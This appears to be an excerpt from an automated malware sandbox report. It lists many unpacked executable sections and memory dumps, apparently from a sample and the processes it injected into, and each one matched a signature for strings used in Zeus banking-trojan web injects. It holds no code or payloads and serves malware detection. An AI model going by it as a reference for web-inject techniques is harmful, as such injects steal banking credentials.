    Source: 1.3.svchost.exe.39c0000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 33.2.cUKxeliGgCix.exe.3152000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 25.2.cUKxeliGgCix.exe.8f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.29b2000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.2a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.cUKxeliGgCix.exe.3100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.cUKxeliGgCix.exe.2e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.cUKxeliGgCix.exe.fe2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 37.2.cUKxeliGgCix.exe.2d32000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2a06c00.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 15.2.cUKxeliGgCix.exe.2482000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 23.2.cUKxeliGgCix.exe.3200000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 35.2.cUKxeliGgCix.exe.20c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 19.2.cUKxeliGgCix.exe.2542000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.cUKxeliGgCix.exe.1040000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.88d400.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 35.2.cUKxeliGgCix.exe.20c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 25.2.cUKxeliGgCix.exe.892000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 21.2.cUKxeliGgCix.exe.22d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 27.2.cUKxeliGgCix.exe.1590000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 15.2.cUKxeliGgCix.exe.2482000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.cUKxeliGgCix.exe.23f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.cUKxeliGgCix.exe.2e42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.41.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.cUKxeliGgCix.exe.3100000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.88e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 27.2.cUKxeliGgCix.exe.1590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 35.2.cUKxeliGgCix.exe.2062000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.5AFlyarMds.exe.6ff110.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.cUKxeliGgCix.exe.2f60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.cUKxeliGgCix.exe.1272000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2c90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.406400.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 33.2.cUKxeliGgCix.exe.3152000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 19.2.cUKxeliGgCix.exe.2910000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 37.2.cUKxeliGgCix.exe.2d32000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 15.2.cUKxeliGgCix.exe.24e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.cUKxeliGgCix.exe.fe2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2a06c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 25.2.cUKxeliGgCix.exe.892000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 8.2.cUKxeliGgCix.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 33.2.cUKxeliGgCix.exe.32f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.cUKxeliGgCix.exe.2f60000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 27.2.cUKxeliGgCix.exe.14f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 21.2.cUKxeliGgCix.exe.24b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 37.2.cUKxeliGgCix.exe.3140000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2cf3c00.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 19.2.cUKxeliGgCix.exe.2542000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.88d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.406400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.cUKxeliGgCix.exe.2be0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 19.2.cUKxeliGgCix.exe.2910000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.5AFlyarMds.exe.704510.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.5AFlyarMds.exe.705110.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 21.2.cUKxeliGgCix.exe.24b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2cf3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 8.2.cUKxeliGgCix.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 35.2.cUKxeliGgCix.exe.2062000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 23.2.cUKxeliGgCix.exe.2e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 25.2.cUKxeliGgCix.exe.8f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 8.2.cUKxeliGgCix.exe.2522000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.cUKxeliGgCix.exe.23f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.cUKxeliGgCix.exe.15e2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.cUKxeliGgCix.exe.15e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.cUKxeliGgCix.exe.2550000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.2a60000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 15.2.cUKxeliGgCix.exe.24e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.cUKxeliGgCix.exe.2cc2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.cUKxeliGgCix.exe.2cc2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 27.2.cUKxeliGgCix.exe.14f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.cUKxeliGgCix.exe.1272000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.888000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.cUKxeliGgCix.exe.2550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.cUKxeliGgCix.exe.2e60000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.cUKxeliGgCix.exe.2e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.cUKxeliGgCix.exe.1040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.22.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 8.2.cUKxeliGgCix.exe.2522000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.88e000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.11.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.29b2000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.cUKxeliGgCix.exe.2be0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.888000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2122838115.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001B.00000002.2126205049.0000000001590000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2148937854.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000019.00000002.2124213315.00000000008F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2148202911.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2085563503.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2139994555.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2148457384.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2132018023.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2150985581.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000006.00000002.2323573296.0000000002550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2119790321.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2134678056.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001B.00000002.2126064053.00000000014F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000000D.00000002.2347000014.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
